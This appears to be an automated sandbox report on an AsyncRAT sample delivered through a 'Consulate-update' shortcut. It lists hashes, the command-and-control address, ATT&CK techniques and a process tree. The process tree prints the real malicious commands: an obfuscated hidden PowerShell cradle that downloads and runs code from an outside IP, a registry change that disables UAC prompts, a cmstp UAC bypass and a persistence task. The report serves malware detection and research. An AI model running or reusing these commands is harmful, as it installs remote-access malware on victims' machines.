asyncrat | 8d73fd55f8ead89828cc7743a144f02619ca38788d701b2069daa3a2e8b722a9

Analysis

max time kernel
133s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
26-09-2022 20:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Thailand/Consulate-update.lnk
Size

1KB
MD5

dc259fbc059c48cdab784cd6f9e0c5dd
SHA1

d465f6ce2dc9e4e69afe583747a412cc6fb75cda
SHA256

ba0f1aeca62265b9b700b6f88031b156a75ed59aa2541b33e4d710112433130f
SHA512

45c7a54c0b789c5c346dba71e1ccce2230ea8c43da5f0ad916946b3df7435e3e9ec6eaabbc7fb79c34cac37c39fc8b3d2a519d73ba0f352ea6bc31a4e0c7a644

Score

10^/10

asyncrat default evasion rat trojan

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Default

worldpassed.publicvm.com:199

Mutex

AsyncMutex_6SI8OkBrC

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4404-190-0x000000000040DF0E-mapping.dmp	asyncrat
behavioral2/memory/4404-189-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

5 4960 powershell.exe
13 2336 powershell.exe

flow	pid	process
5	4960	powershell.exe
13	2336	powershell.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exemshta.exeWScript.exeWScript.execmd.exeWScript.exemshta.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 216 set thread context of 4404 216 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5112 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1940 taskkill.exe

description	pid	process	target process
PID 216 set thread context of 4404	216	powershell.exe	aspnet_compiler.exe

pid	process
5112	schtasks.exe

pid	process
1940	taskkill.exe

Modifies registry class 2 IoCs

Processes:

powershell.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4960	powershell.exe
4960	powershell.exe
2336	powershell.exe
2336	powershell.exe
908	powershell.exe
908	powershell.exe
4524	powershell.exe
4524	powershell.exe
4764	powershell.exe
4764	powershell.exe
5096	powershell.exe
5096	powershell.exe
216	powershell.exe
216	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exepowershell.exepowershell.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	4404	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

cmd.execmd.execmd.exepowershell.execmd.exepowershell.execmd.exeWScript.execmd.exepowershell.exemshta.execmd.exeWScript.execmd.exemshta.exeWScript.exeWScript.exepowershell.exe

description	pid	process	target process
PID 4160 wrote to memory of 1512	4160	cmd.exe	cmd.exe
PID 4160 wrote to memory of 1512	4160	cmd.exe	cmd.exe
PID 1512 wrote to memory of 3500	1512	cmd.exe	cmd.exe
PID 1512 wrote to memory of 3500	1512	cmd.exe	cmd.exe
PID 3500 wrote to memory of 4960	3500	cmd.exe	powershell.exe
PID 3500 wrote to memory of 4960	3500	cmd.exe	powershell.exe
PID 4960 wrote to memory of 1916	4960	powershell.exe	cmd.exe
PID 4960 wrote to memory of 1916	4960	powershell.exe	cmd.exe
PID 1916 wrote to memory of 2336	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 2336	1916	cmd.exe	powershell.exe
PID 2336 wrote to memory of 4336	2336	powershell.exe	cmd.exe
PID 2336 wrote to memory of 4336	2336	powershell.exe	cmd.exe
PID 4336 wrote to memory of 908	4336	cmd.exe	powershell.exe
PID 4336 wrote to memory of 908	4336	cmd.exe	powershell.exe
PID 2336 wrote to memory of 3804	2336	powershell.exe	WScript.exe
PID 2336 wrote to memory of 3804	2336	powershell.exe	WScript.exe
PID 2336 wrote to memory of 5112	2336	powershell.exe	schtasks.exe
PID 2336 wrote to memory of 5112	2336	powershell.exe	schtasks.exe
PID 3804 wrote to memory of 400	3804	WScript.exe	cmd.exe
PID 3804 wrote to memory of 400	3804	WScript.exe	cmd.exe
PID 400 wrote to memory of 4524	400	cmd.exe	powershell.exe
PID 400 wrote to memory of 4524	400	cmd.exe	powershell.exe
PID 4524 wrote to memory of 4232	4524	powershell.exe	cmstp.exe
PID 4524 wrote to memory of 4232	4524	powershell.exe	cmstp.exe
PID 2644 wrote to memory of 1752	2644	mshta.exe	cmd.exe
PID 2644 wrote to memory of 1752	2644	mshta.exe	cmd.exe
PID 1752 wrote to memory of 4108	1752	cmd.exe	WScript.exe
PID 1752 wrote to memory of 4108	1752	cmd.exe	WScript.exe
PID 4108 wrote to memory of 3980	4108	WScript.exe	cmd.exe
PID 4108 wrote to memory of 3980	4108	WScript.exe	cmd.exe
PID 3980 wrote to memory of 4764	3980	cmd.exe	powershell.exe
PID 3980 wrote to memory of 4764	3980	cmd.exe	powershell.exe
PID 2460 wrote to memory of 1940	2460	mshta.exe	taskkill.exe
PID 2460 wrote to memory of 1940	2460	mshta.exe	taskkill.exe
PID 2784 wrote to memory of 5096	2784	WScript.exe	powershell.exe
PID 2784 wrote to memory of 5096	2784	WScript.exe	powershell.exe
PID 2516 wrote to memory of 216	2516	WScript.exe	powershell.exe
PID 2516 wrote to memory of 216	2516	WScript.exe	powershell.exe
PID 216 wrote to memory of 4404	216	powershell.exe	aspnet_compiler.exe
PID 216 wrote to memory of 4404	216	powershell.exe	aspnet_compiler.exe
PID 216 wrote to memory of 4404	216	powershell.exe	aspnet_compiler.exe
PID 216 wrote to memory of 4404	216	powershell.exe	aspnet_compiler.exe
PID 216 wrote to memory of 4404	216	powershell.exe	aspnet_compiler.exe
PID 216 wrote to memory of 4404	216	powershell.exe	aspnet_compiler.exe
PID 216 wrote to memory of 4404	216	powershell.exe	aspnet_compiler.exe
PID 216 wrote to memory of 4404	216	powershell.exe	aspnet_compiler.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Thailand\Consulate-update.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Thailand\Th-Pass\Consulate-update.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\system32\cmd.exe
CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F='IEX(NEW-OBJECT NET.W';$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6='EBCLIENT).DOWNLO';[BYTE[]];$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567='DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82(''http://209.209.41.33/p400/Good.txt'')'.REPLACE('DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82','ADSTRING');[BYTE[]];IEX($129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F+$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6+$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567)
3⤵
- Suspicious use of WriteProcessMemory
PID:3500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F='IEX(NEW-OBJECT NET.W';$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6='EBCLIENT).DOWNLO';[BYTE[]];$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567='DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82(''http://209.209.41.33/p400/Good.txt'')'.REPLACE('DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82','ADSTRING');[BYTE[]];IEX($129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F+$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6+$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567)
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell < C:\Users\Admin\AppData\Roaming/educational.png
5⤵
- Suspicious use of WriteProcessMemory
PID:1916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
6⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]]
7⤵
- Suspicious use of WriteProcessMemory
PID:4336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]]
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Favorites\a.vbs"
7⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Favorites\a.bat" "
8⤵
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\Users\Admin\Favorites\b.ps1
9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4524

C:\Windows\system32\cmstp.exe
"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\2r2aimsp.inf
10⤵
PID:4232

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn administartor /sc minute /st 00:10 /tr C:\Users\Admin\Favorites\System.vbs
7⤵
- Creates scheduled task(s)
PID:5112

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""cmd.exe /c start """""""" """"%USERPROFILE%\Favorites\Assembly.vbs"""""",0:close")
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\Favorites\Assembly.vbs"
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Favorites\Assembly.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Favorites\x.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\Users\Admin\Favorites\x.ps1
5⤵
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4764

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""taskkill /IM cmstp.exe /F"", 0, true:close")
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2460

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM cmstp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\Favorites\System.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\Admin\Favorites\micro.ps1
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\Favorites\System.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\Admin\Favorites\micro.ps1
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:216

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4404

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8b5d3a2c2b26ac36b88cf03dd0a32fa9

SHA1
a9122eb088176912311fc0f8eb0b8f020693d259

SHA256
8a11a416df1c3ef93ee65773a43d84cdec960e9d551fcb0a4351fc15f1d0ff52

SHA512
47e0f4eddc7e7323988597ac5fcf7c7ea15a9999667e07d6cc422fb072a5d2e0c5501a11db8b4f5e8a0f380a85ef0a60f9a201ed30f80b104b825bfe8d60a7c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
66c4ecc8569e72360d2dd87b1a3e43d0

SHA1
0204696e8d18cbdf3d8ecfef0ffd3005eb170372

SHA256
0211b10a9681e2efa4ed1da5b7dc0749953240aa431edfc21456a1c98357458f

SHA512
67715718b6bf724cba7cd57e70c8c1d220da046bbcd0619200e4be99984115589ca49701096690bc4c10e5732e98fc0f3656696b18f3a55da3a12eb53635f7e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
57866c0b343808442b8657c28107e5cd

SHA1
b131d901e867ca5a3de95ca3fc12b5a483137e31

SHA256
232e6e16bb2f27daa78c8f60a34e6b2da4314cc004487c0b5b8ed0563d82fb73

SHA512
45b9cb4901b36bb32ac1807a43f91b6e023a88ac3f92091051a0162bc275d21b850d6861f15caae188a8ac5c8d3fd9ef8cd8925afb230f4588208b1e449b59cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8b591dabf3d165412ca5160b0fc9f7a0

SHA1
7f4003f64d280a98099a799b7303ab94adfea747

SHA256
d90968baa89063686e83e4514b0b0341f703aefec3e00f63020a344763e92f60

SHA512
57aaed079e38c08f0fe05aec21c02c84a7ed80780e796a5944227d5f17439a1b4378004931512965445826457f30488ec8f173b199e0e5374d4828c43a7e8af5

Download Submit
C:\Users\Admin\AppData\Roaming\educational.png
Filesize
251B

MD5
292374cd21675135acb516497a730fd9

SHA1
f6e019093fc9a0952b7ae2c536b0b9f37071d0bf

SHA256
86cf5e4e86c0aae75158c04e13051275c341af7bf54b7a7cd49eced95d21b1b0

SHA512
491623e21d1740e234925bf0d1df1ac6402404bbcbad1d3e926ebdca0eeb55e1ab2322d38c7501f28b0a8deda853e087bfc22f34ca9b63995428ba8a3c03da32

Download Submit
C:\Users\Admin\Favorites\Assembly.vbs
Filesize
331B

MD5
66d268811c166c82aaef2f52450b0c73

SHA1
f7810c1003732c440b986718a8217dd733e88f74

SHA256
581df8170200c95d38ce78eba4e9942d47cad443bbc0148954e48df04eec3b34

SHA512
36de3a5f59ee7a531832ae7e43997a3019ad8a15b0d1b321e589a85d77af27dab80b90a0ef5c978c4fffcc4d32fe8d870f60e9cf3e5bff302e4292bfc6196830

Download Submit
C:\Users\Admin\Favorites\System.vbs
Filesize
121B

MD5
dada8407cf4051919362d16a6d735cde

SHA1
8a2788926f97dbd59c99ad51b3383c59992c6c2e

SHA256
ee512a4266049b505b2b5c6c4c7bd66baadd37eda61bfe7f31f6cfcc1c955a77

SHA512
42c6b1fac8502e3b21cbd6cda11601afc55ca539db03667eec7c839bc33c70ed1a6aeba5a3c9684951143658b17183c2782bec8a0108b345c0ac2aebdaa8fc9f

Download Submit
C:\Users\Admin\Favorites\UAC-B.dll
Filesize
11KB

MD5
cc6ba6fc273dbfbb5c9698c0cf4719b9

SHA1
a2b3433b728b0874ec69d8a629d5f0dd05c0946d

SHA256
320316cdda2aa0e8709472a2b8eb8debcd0f8bb6f9af4d4d4b3bc67068ceebe7

SHA512
fe2fe2f150fbf619dd7616c86c93a42446b7c915b92fb865971dcf7dd595c6483da7386ce40b99802dc0942068bd1703821e0e3b15a6ebe557619cf6fa413c61

Download Submit
C:\Users\Admin\Favorites\a.bat
Filesize
86B

MD5
4625a049cd6ea721b706699ab3c36dff

SHA1
dbb82c9e8cb7bdcf617e7c4e158d031275b5ec24

SHA256
c751a3cb67ab1c75f1de6e24b7193123cc815524c538973110d1f6027da24dc0

SHA512
35674c3c1d6c449b3716ddf2ca8733e255a8f642723186a847694fb936b50a91e6bd7ab7f6edf1489592a583109739a4f0c12769823e2fc163860eeb7004b6c0

Download Submit
C:\Users\Admin\Favorites\a.vbs
Filesize
485B

MD5
5ce49e20c572f2b6d4b43fc61a6906ec

SHA1
170185b8ab9fc4749f28e5796999c23b50be89dc

SHA256
d6a43aad0aa8e510f01409921c8b0b5c8d93d51d1f7f39340db775c164686412

SHA512
c49e14c094e4d5e108aa50889a9fb06428a3d7a1f74d868c9b7d37f35658a64ea205b00681ad83aef428113fdf6fead8ef98dd1e6b38d84b8306765025c2e8e3

Download Submit
C:\Users\Admin\Favorites\b.ps1
Filesize
173B

MD5
e1d9cbc41ffacef02695df17824a82e0

SHA1
970ae087b8a3d11fb3e2a9b8de1592a166436fa7

SHA256
61571d1fd0000c02eef19b7dd6e452e2f9eba2e947f4c96d781e79d35802043f

SHA512
3b4034b2072a309adeb1af8b540023791262915f4b1347f4aa27f8aedcbbb6e1126c1a4d5f1db1ce2ad5638d24d7ba3025a8451c291241db2f2a99b0832f620a

Download Submit
C:\Users\Admin\Favorites\micro.ps1
Filesize
888KB

MD5
2c012c85dad2ed3845d3606fb4204d9d

SHA1
aae41574a6a9fe13b8552a3aba61bc5a550d4161

SHA256
ad4059af90d7d3a2690eef17d4fe45cc1d6b5b8c0ae806bc0d598e5a4838cd84

SHA512
7d9da6e1f243a2bd55b7ce91d2657077268612cc176bc279e79fabedcd7cde740534d46289371759532e31676f62f76af602780f4f728437bc8344e62799873d

Download Submit
C:\Users\Admin\Favorites\micro.ps1
Filesize
444KB

MD5
6c7473033862bc8f2d1ca5d2f64593a8

SHA1
420a0f9508cf7a6e17ecb7670a9df7cbbb8c24d7

SHA256
72842be7f7e16ffbb22c2646b18aa647537742782c2df530ad5076890743ea0e

SHA512
2a9eda8fec9f0684bb2a8016868150a660181dabdfb29eec7a942ee4f843c63a854c42aaab2395e418dbb35be11134ec4ff5014e2daa4210bd891238d759f2f2

Download Submit
C:\Users\Admin\Favorites\x.bat
Filesize
86B

MD5
03fc58bceab448c9f183fbe86fed1f11

SHA1
07f3d54b0b40755e8f58f5fdab95049def6578e3

SHA256
6062f0e764ccd855b61ba49720065dfd6f6c6864c4eb1e9dce95ba8a293fd756

SHA512
c0e9aec7a6c5aaae3b018d44f1fbdc1939026ce16fad20211a0521e3db9e470d842508b7d2167672e1585bafeb4b2f1fe694ca96ddb9137ff9e5d3b4ca53ea4f

Download Submit
C:\Users\Admin\Favorites\x.ps1
Filesize
567B

MD5
e9859d3134c68db3134a6ca7df484344

SHA1
f4eec5ee9aa11a82d19bdb78a174c574669fd1d8

SHA256
a4aaf6c64969788732b20c79c1299719b84a52eddda13778a672195bbfba4a6c

SHA512
47982ddf074418c350790f5f7d53edddbbb47e7768939ebf88f4812b01f241c8bff509dbd9a8e6232eb6ec7f8b0344a1a59474ea45da0c80af9f04ba21498cdb

Download Submit
C:\Windows\temp\2r2aimsp.inf
Filesize
834B

MD5
09c0056318d62ee84963c66ae83d6c1b

SHA1
625936963d4a0059daff7222a1628198be9b7a4f

SHA256
25b2a55bade39fe6d90e0fb06068062a95af522f62d743454ffa4ddd478781d8

SHA512
b03301fcafbc905ac7724b5ee878208c4c7dc039b02edcfc00e51742c868ab4cf3f830dbbe52b314ee24f8d87f39b6c9eb3e6c188ddc75a9b52f7dfab85cb2d0

Download Submit
memory/216-191-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

Filesize
10.8MB

Download
memory/216-188-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

Filesize
10.8MB

Download
memory/216-187-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

Filesize
10.8MB

Download
memory/216-184-0x0000000000000000-mapping.dmp

Download
memory/400-154-0x0000000000000000-mapping.dmp

Download
memory/908-146-0x0000000000000000-mapping.dmp

Download
memory/908-162-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

Filesize
10.8MB

Download
memory/908-148-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

Filesize
10.8MB

Download
memory/1512-132-0x0000000000000000-mapping.dmp

Download
memory/1752-166-0x0000000000000000-mapping.dmp

Download
memory/1916-137-0x0000000000000000-mapping.dmp

Download
memory/1940-173-0x0000000000000000-mapping.dmp

Download
memory/2336-140-0x0000000000000000-mapping.dmp

Download
memory/2336-142-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

Filesize
10.8MB

Download
memory/2336-144-0x000001DB38990000-0x000001DB38A06000-memory.dmp

Filesize
472KB

Download
memory/2336-143-0x000001DB38500000-0x000001DB38544000-memory.dmp

Filesize
272KB

Download
memory/2336-152-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

Filesize
10.8MB

Download
memory/2336-155-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

Filesize
10.8MB

Download
memory/3500-133-0x0000000000000000-mapping.dmp

Download
memory/3804-149-0x0000000000000000-mapping.dmp

Download
memory/3980-171-0x0000000000000000-mapping.dmp

Download
